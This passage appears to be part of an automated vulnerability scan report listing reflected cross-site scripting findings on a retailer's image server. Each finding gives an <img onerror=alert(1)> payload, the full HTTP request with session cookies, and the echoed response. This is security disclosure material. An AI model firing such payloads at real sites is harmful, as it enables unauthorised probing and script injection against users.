Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:44 GMT
Connection: close

Unable to find /pacsunproducts/8281289_01_06616b4a<img src=a onerror=alert(1)>08531805115

3.156. http://images3.pacsun.com/is/image/pacsunproducts/8291395_01_040 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8291395_01_040

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1aa81<img%20src%3da%20onerror%3dalert(1)>32a833d8e88 was submitted in the REST URL parameter 4. This input was echoed as 1aa81<img src=a onerror=alert(1)>32a833d8e88 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8291395_01_0401aa81<img%20src%3da%20onerror%3dalert(1)>32a833d8e88?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:15 GMT
Connection: close

Unable to find /pacsunproducts/8291395_01_0401aa81<img src=a onerror=alert(1)>32a833d8e88

3.157. http://images3.pacsun.com/is/image/pacsunproducts/8301830_01_040 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8301830_01_040

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ae391<img%20src%3da%20onerror%3dalert(1)>b5d850ecb0a was submitted in the REST URL parameter 4. This input was echoed as ae391<img src=a onerror=alert(1)>b5d850ecb0a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8301830_01_040ae391<img%20src%3da%20onerror%3dalert(1)>b5d850ecb0a?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:20 GMT
Connection: close

Unable to find /pacsunproducts/8301830_01_040ae391<img src=a onerror=alert(1)>b5d850ecb0a

3.158. http://images3.pacsun.com/is/image/pacsunproducts/8301830_sw_040 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8301830_sw_040

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3ad42<img%20src%3da%20onerror%3dalert(1)>34c513cf0a4 was submitted in the REST URL parameter 4. This input was echoed as 3ad42<img src=a onerror=alert(1)>34c513cf0a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8301830_sw_0403ad42<img%20src%3da%20onerror%3dalert(1)>34c513cf0a4?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:21 GMT
Connection: close

Unable to find /pacsunproducts/8301830_sw_0403ad42<img src=a onerror=alert(1)>34c513cf0a4

3.159. http://images3.pacsun.com/is/image/pacsunproducts/8301830_sw_070 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8301830_sw_070

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ffe7a<img%20src%3da%20onerror%3dalert(1)>61eb2ed236 was submitted in the REST URL parameter 4. This input was echoed as ffe7a<img src=a onerror=alert(1)>61eb2ed236 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8301830_sw_070ffe7a<img%20src%3da%20onerror%3dalert(1)>61eb2ed236?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 88
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:21 GMT
Connection: close

Unable to find /pacsunproducts/8301830_sw_070ffe7a<img src=a onerror=alert(1)>61eb2ed236

3.160. http://images3.pacsun.com/is/image/pacsunproducts/8332694_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8332694_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a7c25<img%20src%3da%20onerror%3dalert(1)>bf4a77e9564 was submitted in the REST URL parameter 4. This input was echoed as a7c25<img src=a onerror=alert(1)>bf4a77e9564 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8332694_01a7c25<img%20src%3da%20onerror%3dalert(1)>bf4a77e9564?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:16 GMT
Connection: close

Unable to find /pacsunproducts/8332694_01a7c25<img src=a onerror=alert(1)>bf4a77e9564

3.161. http://images3.pacsun.com/is/image/pacsunproducts/8335093_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8335093_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bb82c<img%20src%3da%20onerror%3dalert(1)>574c67e7dbe was submitted in the REST URL parameter 4. This input was echoed as bb82c<img src=a onerror=alert(1)>574c67e7dbe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8335093_01bb82c<img%20src%3da%20onerror%3dalert(1)>574c67e7dbe?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:46 GMT
Connection: close

Unable to find /pacsunproducts/8335093_01bb82c<img src=a onerror=alert(1)>574c67e7dbe

3.162. http://images3.pacsun.com/is/image/pacsunproducts/8335697_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8335697_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 27c18<img%20src%3da%20onerror%3dalert(1)>e49400a6971 was submitted in the REST URL parameter 4. This input was echoed as 27c18<img src=a onerror=alert(1)>e49400a6971 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8335697_0127c18<img%20src%3da%20onerror%3dalert(1)>e49400a6971?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:13 GMT
Connection: close

Unable to find /pacsunproducts/8335697_0127c18<img src=a onerror=alert(1)>e49400a6971

3.163. http://images3.pacsun.com/is/image/pacsunproducts/8349110_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8349110_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2eb8d<img%20src%3da%20onerror%3dalert(1)>d5c30b3b792 was submitted in the REST URL parameter 4. This input was echoed as 2eb8d<img src=a onerror=alert(1)>d5c30b3b792 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8349110_012eb8d<img%20src%3da%20onerror%3dalert(1)>d5c30b3b792?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:53 GMT
Connection: close

Unable to find /pacsunproducts/8349110_012eb8d<img src=a onerror=alert(1)>d5c30b3b792

3.164. http://images3.pacsun.com/is/image/pacsunproducts/8349136_01_001 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8349136_01_001

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c44d2<img%20src%3da%20onerror%3dalert(1)>c9ec97fa83d was submitted in the REST URL parameter 4. This input was echoed as c44d2<img src=a onerror=alert(1)>c9ec97fa83d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8349136_01_001c44d2<img%20src%3da%20onerror%3dalert(1)>c9ec97fa83d?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:06 GMT
Connection: close

Unable to find /pacsunproducts/8349136_01_001c44d2<img src=a onerror=alert(1)>c9ec97fa83d

3.165. http://images3.pacsun.com/is/image/pacsunproducts/8349136_sw_001 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8349136_sw_001

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b0452<img%20src%3da%20onerror%3dalert(1)>04e3d076a29 was submitted in the REST URL parameter 4. This input was echoed as b0452<img src=a onerror=alert(1)>04e3d076a29 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8349136_sw_001b0452<img%20src%3da%20onerror%3dalert(1)>04e3d076a29?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:07 GMT
Connection: close

Unable to find /pacsunproducts/8349136_sw_001b0452<img src=a onerror=alert(1)>04e3d076a29

3.166. http://images3.pacsun.com/is/image/pacsunproducts/8349136_sw_040 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8349136_sw_040

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c8217<img%20src%3da%20onerror%3dalert(1)>5ad7d86071 was submitted in the REST URL parameter 4. This input was echoed as c8217<img src=a onerror=alert(1)>5ad7d86071 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8349136_sw_040c8217<img%20src%3da%20onerror%3dalert(1)>5ad7d86071?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 88
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:06 GMT
Connection: close

Unable to find /pacsunproducts/8349136_sw_040c8217<img src=a onerror=alert(1)>5ad7d86071

3.167. http://images3.pacsun.com/is/image/pacsunproducts/8357543_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8357543_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 79f41<img%20src%3da%20onerror%3dalert(1)>5ccd163b7c8 was submitted in the REST URL parameter 4. This input was echoed as 79f41<img src=a onerror=alert(1)>5ccd163b7c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8357543_0179f41<img%20src%3da%20onerror%3dalert(1)>5ccd163b7c8?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
